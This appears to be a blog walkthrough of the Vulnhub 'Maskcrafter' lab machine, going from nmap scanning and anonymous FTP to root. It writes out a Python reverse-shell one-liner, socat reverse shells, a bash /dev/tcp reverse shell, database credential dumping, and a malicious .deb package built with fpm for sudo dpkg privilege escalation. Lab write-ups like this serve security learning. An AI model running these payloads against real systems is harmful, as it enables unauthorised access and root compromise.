Vulnhub – Maskcrafter Walkthrough

Scanning the box with nmap –A –T4 –p- 192.168.1.18 –vv

We can see that we have a ftp port that’s open for anonymous login, so let’s try it:

Ok the file NOTES.txt is about having the login as admin is a bad idea:

So we’re going to try admin:admin as our login on page http://192.168.1.18/debug/

And we got in, let’s select one by one and see what we got:

Ifconfig displayed the ip and stuff, aand thd id gave us:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

The uname gave us:

Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Now we can use BurpSuite to push a shell to the target using:

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.11”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

In /var/www/html path there is a file db.php where we can see there is a password and a local database running.

Now we log to mysql using mysql –u web –p and then inter the password P@ssw0rdweb

show databases;

use mydatabase;

show tables;

select * from creds;

select * from login;

Then we use cred12345!! to decrypt the file cred.zip which we downloaded earlier from the ftp port:

It’s a password for the user userx let’s login with ssh:

Ok edit the file whatsmyid with nano and run it like this sudo -u evdaez ./whatsmyid.sh

Let’s see sudo privilege for the new user evdaez:

Ok now we’re going to escalate our privilege with socat, let’s start a listener on our machine using this command:

socat file:`tty`,raw,echo=0 tcp-listen:444

And on the host machine use this:

sudo -u researcherx /usr/bin/socat TCP4:192.168.1.11:444 EXEC:bash,pty,stderr,setsid,sigint,sane

Now to be clear this part is a real headache so follow me steps and use this link too https://gtfobins.github.io/gtfobins/dpkg/ or it won’t work, this is after a lot of trail and errors:

First download this from github https://github.com/jordansissel/fpm and install it as:

Gem install fpm from inside the folder.

Apt install rpm

Then create a tiny reverse shell:

#! /bin/bash

bash -i >& /dev/tcp/192.168.1.11/3333 0>&1

And save it as root.sh

Then these commands in order:

TF=$(mktemp -d)

echo ‘exec /bin/sh’ > $TF/root.sh

fpm -n x -s dir -t deb -a all –before-install $TF/root.sh $TF

You will get this message Created package {:path=>”x_1.0_all.deb”}

Now use wget to transfer the file x_1.0_all.deb to the target machine

And run it as sudo dpkg –I file x_1.0_all.deb

And finally we are root!!!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s